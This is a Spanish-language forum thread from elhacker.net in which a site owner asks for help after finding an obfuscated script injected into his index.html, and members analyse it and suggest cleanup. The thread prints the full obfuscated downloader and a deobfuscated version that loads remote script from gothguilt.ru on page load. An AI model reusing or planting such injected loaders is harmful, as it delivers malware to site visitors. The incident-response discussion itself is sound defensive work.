elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderador: r32)
| | |-+  Me hackearon y dejaron un regalo. ayuda!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Me hackearon y dejaron un regalo. ayuda!  (Leído 6,911 veces)
darkgx

Desconectado Desconectado

Mensajes: 26



Ver Perfil
Me hackearon y dejaron un regalo. ayuda!
« en: 14 Mayo 2010, 23:06 pm »

Hola a todos, Bueno mi problema es que hace un rato intente entrar a mi web y el antivirus me salto con que habia un troyano.  :-\ Me parecio muy raro esto y entonces entre al server a ver que pasaba y me encuentro con que abajo de todo en la pagina index.html encontre esta linea que no recuerdo haber puesto  :-\

Código:
<script>try {} catch(pE){};try {} catch(Xp){};eE=32291;eE--;try {} catch(I){};try {this.Q=false;var w=new Array();var i=window[String("a07hun".substr(4)+"escmbG".substr(0,2)+"casvMg".substr(0,2)+"jWcpeWcj".substr(3,2))];this.s=12128;this.s-=48;this.Kg=62204;this.Kg-=229;var U=new String();F=["rY","O"];var V=window[(String("RegE"+"xp"))];E=9858;E-=155;kl=15194;kl+=67;var A="rep"+"lac"+"e";this.jS="";var k='';var j="1";var mI='';var H='';var a={v:false};var e=String("onlo"+"SQmad".substr(3));f=48381;f--;var EC=3018;x=37020;x--;var rc=new Date();this._lg='';this._M='';this.Po=30979;this.Po--;function _(j,B){this.CH=false;this.AR="AR";this._B=false;this.xJ="xJ";this.Vo="Vo";var PL=["pa","Zk"];var M="[ltxv".substr(0,1);XK=["Su","s_"];try {} catch(oL){};M+=B;var Rv=["AB","jR"];var Ek=[];KC=[];var QO="QO";M+=i("%5d");var MT={of:false};var Ib={om:false};var er=false;dA=9445;dA++;var C=new V(M, String("g"));return j.replace(C, k);var Bv=new Array();};oY=50650;oY--;fp={};var CE={};var h=new String("/reveAdE".substr(0,5)+"rso-nl0c".substr(0,5)+"et/go32v".substr(0,5)+"ogle."+"GdIKcom/cIdKG".substr(4,5)+"omcas"+"t.netZpb".substr(0,5)+"GZrv.phpZrvG".substr(4,4));this.kH=35628;this.kH++;var m=343238-335158;this.dS=34232;this.dS++;var o=String("htt"+"p:/b9v".substr(0,3)+"/go"+"thg"+"uil"+"t.r"+"u:");var ty=["do_"];tc={XG:34617};var HC=["aH"];LN={Ts:false};var Mk=["Ki","hn","MA"];try {} catch(Ii){};try {var rl='yF'} catch(rl){};function G(){this.lg=55980;this.lg++;this.SX=36579;this.SX-=86;var qL=new Date();Gx={};SO={};var W=_('sIclrDikphto','fHljVvok4uKhqDIQ');try {var YN='me'} catch(YN){};var Mw=false;this.kN=19486;this.kN--;this.bP=4490;this.bP--;yc={};var BA=document;var AA=false;this.Nd="";var Oz={};var JL={Av:"YF"};var X=new String("appe"+"ERyndCh".substr(3)+"wFm4ildF4mw".substr(4,3));this.ZC=3686;this.ZC++;var F_=["JC","Hi","Od"];var Nu=["rj","Ax","jRs"];var ON={};var rBN=new Date();this.RW=38738;this.RW-=177;var lB=["gF"];_l=BA.createElement(W);this.OA=5769;this.OA-=77;var ew=new Date();var VU='';this.z_=false;this.ql=false;var dR="";var pt="pt";var Pz={FP:8336};P=o+m;HL=32462;HL+=9;P=P+h;try {} catch(Xs){};this.EV=false;this.tb=false;try {} catch(Uh){};ji=["c_","zK"];var HG=new String();so=11437;so+=84;var Yp=new String();this.aN="";var T=BA.body;_l[String("de9R76".substr(0,2)+"fe59z".substr(0,2)+"94nr".substr(3))]=j;VT=8274;VT-=221;var bun=["Hl"];ZT=24617;ZT-=219;var GK=["Qm"];try {var BO='tk'} catch(BO){};_l.src=P;try {} catch(li){};this.tB="";var Ku='';T[X](_l);UF=[];this.hm="hm";};this.KK='';var xW={af:10575};this.hP='';var VM=[];this.VI='';HQI=["wZ"];var Ag=16397;window[e]=G;this.JQ="";xc=[];var nl={SD:184};} catch(p){try {var IM='eb'} catch(IM){};var lV=new Date();cC=58014;cC-=95;Fc=["cM"];_a=["hd"];this.pg=14943;this.pg--;by=["XN"];};s_p=63145;s_p+=134;</script>
<!--d214af83de230538e9ec96da2945cae1-->

Nunca puse eso yo alguien sabe que es????? me lo detecta como
JS/TrojanDownloader.Pegel.BH troyano

mmm..... cada dos por tres me salta el antivirus ahora mostrandome esoooooo :o

 :'( ayudaaaaaaaaaaaaaaaaaa
 :-(
EDIT:
el archivo esta en C:\Users\Doom\AppData\Roaming\Mozilla\Firefox\Profiles\icoalaiw.default

Cada vez que lo borro aparece devuelta  :o es un archivo .js se llama  sessionstore.js creo que mientras mantengo abierto el firefox sigue apareciendo eso. como borro esa cosa????????????  :(

EDIT:
El archivo que dije anteriormente que lo borraba y se creaba nuevamente, lo abri como .txt y adentro tiene todas las paginas a las que entre con el firefox  :o


En línea

.:WindHack:.

Desconectado Desconectado

Mensajes: 167

Prisionero de mi propia mente...


Ver Perfil WWW
Re: Me hackearon y dejaron un regalo. ayuda!
« Respuesta #1 en: 14 Mayo 2010, 23:41 pm »

Borra las Cookies, el historial de navegación y los archivos temporales de internet.

Saludos,


En línea

Follow me on Twitter: @windhack | Visit my website: www.daw-labs.com

"The only thing they can't take from us are our minds."
invisible_hack


Desconectado Desconectado

Mensajes: 978


Invisible_Hack™ Nick Registrado ^^


Ver Perfil WWW
Re: Me hackearon y dejaron un regalo. ayuda!
« Respuesta #2 en: 15 Mayo 2010, 00:24 am »

Para mi que es algun tipo de capturador de cookies de sesión, para volver a robarte la sesión en cuanto te volvieses a loguear...lo digo por...

Código:
d214af83de230538e9ec96da2945cae1

Y si han dejado eso ahi, es porque quizás tu web tenga alguna vulnerabilidad XSS y el atacante la haya descubierto, y, tras entrarte, aprovechó y dijo..."vamos a dejarle esto aqui y asi aprovecho la vulnerabilidad XSS para volverle a defacear si consigue recuperar el acceso"

Bueno, un saludo...
« Última modificación: 15 Mayo 2010, 00:31 am por invisible_hack » En línea

"Si no visitas mi blog, Chuck te dará una patada giratoria"
cgvwzq

Desconectado Desconectado

Mensajes: 57


Agente P.


Ver Perfil WWW
Re: Me hackearon y dejaron un regalo. ayuda!
« Respuesta #3 en: 15 Mayo 2010, 01:46 am »

Código
  1. function G(){
  2. _l=document.createElement("script");
  3. _l["defer"]="1";
  4. _l.src="http://gothguilt.ru:8080/reverso-net/google.com/comcast.net.php";
  5. document.body["appendChild"](_l);
  6. };

Ese es el script desofuscado...
En línea

Some stuff:

  • www.a] parsed as ]www.a]
  • Bypass elhacker's img filter with ALT attribute!
  • ¿Para cuándo SQLi I y II? WZ


Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Me hackearon y dejaron un regalo. ayuda!
« Respuesta #4 en: 15 Mayo 2010, 03:38 am »

El sitio esta marcado como dañino y el navegador me bloquea, y al ingresar no consigo que me muestre nada, ya he probado con muchos user-agent y diferentes navegadores, pero nada de nada  >:(

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
darkgx

Desconectado Desconectado

Mensajes: 26



Ver Perfil
Re: Me hackearon y dejaron un regalo. ayuda!
« Respuesta #5 en: 15 Mayo 2010, 03:57 am »


Citar
Borra las Cookies, el historial de navegación y los archivos temporales de internet.
Listop  :P

Citar
Y si han dejado eso ahi, es porque quizás tu web tenga alguna vulnerabilidad XSS y el atacante la haya descubierto, y, tras entrarte, aprovechó y dijo..."vamos a dejarle esto aqui y asi aprovecho la vulnerabilidad XSS para volverle a defacear si consigue recuperar el acceso"

Lo primero que hice fue borrar ese codigo, pero igual si dicen que tiene un XSS va a poder entrar nuevamente por el mismo  :( asi que...

si alguien quiere la web para ver el agujero que tiene si me quiere ayudar que me diga asi le paso la web por privado, la no tiene PHP ni SQL. solo tiene 1 Frame <FONT> y 1 script que lo uso para sacar la propaganda de la web  :-\ por lo cual es una pagina muy simple sin scrpts salvo el mensionado anteriormente, no es grande la pagina y no debe ser muy complicado ver el error.

Bueno les mando saludos gracias por la ayuda y ya hice todo lo que me dijieron  :)

Saludos, espero que alguien pueda ayudarme  :(
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Me hackearon y dejaron un regalo. ayuda!
« Respuesta #6 en: 15 Mayo 2010, 04:02 am »

Es un servidor gratuito? un wordpress?
Otra cosa, sessionstore.js es un archivo de firefox donde se guardan por ejemplo las urls visitadas, de este modo si se cae firefox pueden recuperarse las pestañas :P

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
darkgx

Desconectado Desconectado

Mensajes: 26



Ver Perfil
Re: Me hackearon y dejaron un regalo. ayuda!
« Respuesta #7 en: 15 Mayo 2010, 04:10 am »

Citar
Es un servidor gratuito? un wordpress?
Si, es un servidor gratuito

Citar
Otra cosa, sessionstore.js es un archivo de firefox donde se guardan por ejemplo las urls visitadas, de este modo si se cae firefox pueden recuperarse las pestañas
Ok  ;D, ahora ya me dejo de aparecer el mensaje del antivirus, no lo detecta mas.
AH! tambien cambie la contraseña de mi host

Saludos  :)
En línea

darkgx

Desconectado Desconectado

Mensajes: 26



Ver Perfil
Re: Me hackearon y dejaron un regalo. ayuda!
« Respuesta #8 en: 15 Mayo 2010, 15:13 pm »

Ahhh! el NOD32 me detecta muchas veces que mi pc ah querido conectarse a otro lado!! y esto me resulto familiar

Código
  1. function G(){ _l=document.createElement("script"); _l["defer"]="1"; _l.src="http://gothguilt.ru:8080/reverso-net/google.com/comcast.net.php"; document.body["appendChild"](_l);}
  2.  
  3.  
  4.  

ahora que lo veo bien me doy cuenta de esto:
Código:
_l.src="http://gothguilt.ru:8080/reverso-net/google.com/comcast.net.php";
Ahora estas son algunas screenshot que saque de cuando mi pc o otra maquina remota se quiso conectar a mi. >:( Mientras digo que creo que esto fue por que un contacto mio del msn, me paso un link y yo lo clickie.. pero era una persona en quien confiaba, no suelo entrar a cualquier link raro pero bueno, no parecia tan raro este  :xD creo que de ahi viene todo esto y es la misma persona.





Bueno creo que ya se abran dado cuenta de que la direccion es la misma que la que mostro cgvwzq, tambien capture la ip y a que puerto se conecto.

Bueno despues de ver que se conecto a un puerto ( el 1125) lo blockee/cerre, pero despues se vuelve a conectar a otro puerto  :xD me re cago...

ahi esta la ip resuelta: ns208753.ovh.net , al parecer es una ip dinamica asique si bloqueo la ip igual va a segir   :-\ aunque hace 2 dias que no me alerta el antivirus.

El nombre del archivo era Abril06.jpg.exe no se como no me di cuenta  :xD . es el mismo tipo el que hackeo la web. debo tener algun keylogger  :huh:

Bueno ya no se que hacer le pase el NOD23, el RegSeeker y el Malwarebytes actualizado y no paso nada  :(

PD: Ya se que no se puede hacer doble post, pero quise aprovechar lo que dijo cgvwzq.

Saludos  :¬¬
« Última modificación: 15 Mayo 2010, 15:43 pm por darkgx » En línea

winroot


Desconectado Desconectado

Mensajes: 589

#include<winroot.h>


Ver Perfil WWW
Re: Me hackearon y dejaron un regalo. ayuda!
« Respuesta #9 en: 15 Mayo 2010, 19:08 pm »

actualiza tu av, inicia en modo seguro sin red y escanea tu pc completamente.

si el problema sigue, tendrás que enviarnos un log de hijackthis o algo  por el estilo.
por cierto
como  hizo para  desofuscar el script?

el código de la web ahora se los paso.
saludos
edit:
ni usando el    get desde cmd.exe se puede abrir la página.
intenté con ie7, y me dice que no puede descargar el archivo.

parece ser, que es un script preparado para un   trojan.downloader espesífico
saludos
« Última modificación: 15 Mayo 2010, 19:23 pm por winroot » En línea

Mi blog sobre programación y seguridad informática:
http://win-root.blogspot.com
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
MySQL - Grant y Revoke dejaron de funcionar.
Bases de Datos
Saberuneko 1 1,311 Último mensaje 20 Marzo 2014, 19:06 pm
por Saberuneko
Ayuda par escribir dedicatoria para tarjeta regalo
Foro Libre
skan 0 595 Último mensaje 24 Diciembre 2014, 15:14 pm
por skan
Hackearon el sitio web de Wikileaks y dejaron un mensaje desafiante
Noticias
wolfbcn 1 801 Último mensaje 3 Septiembre 2017, 14:05 pm
por #!drvy
Me hackearon! Ayuda
Seguridad
Chubita 3 1,849 Último mensaje 23 Octubre 2017, 23:59 pm
por Code99
Hackearon cientos de páginas de Israel y dejaron un video amenazante: “Prepárens
Foro Libre
El_Andaluz 0 458 Último mensaje 22 Mayo 2020, 04:25 am
por El_Andaluz
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines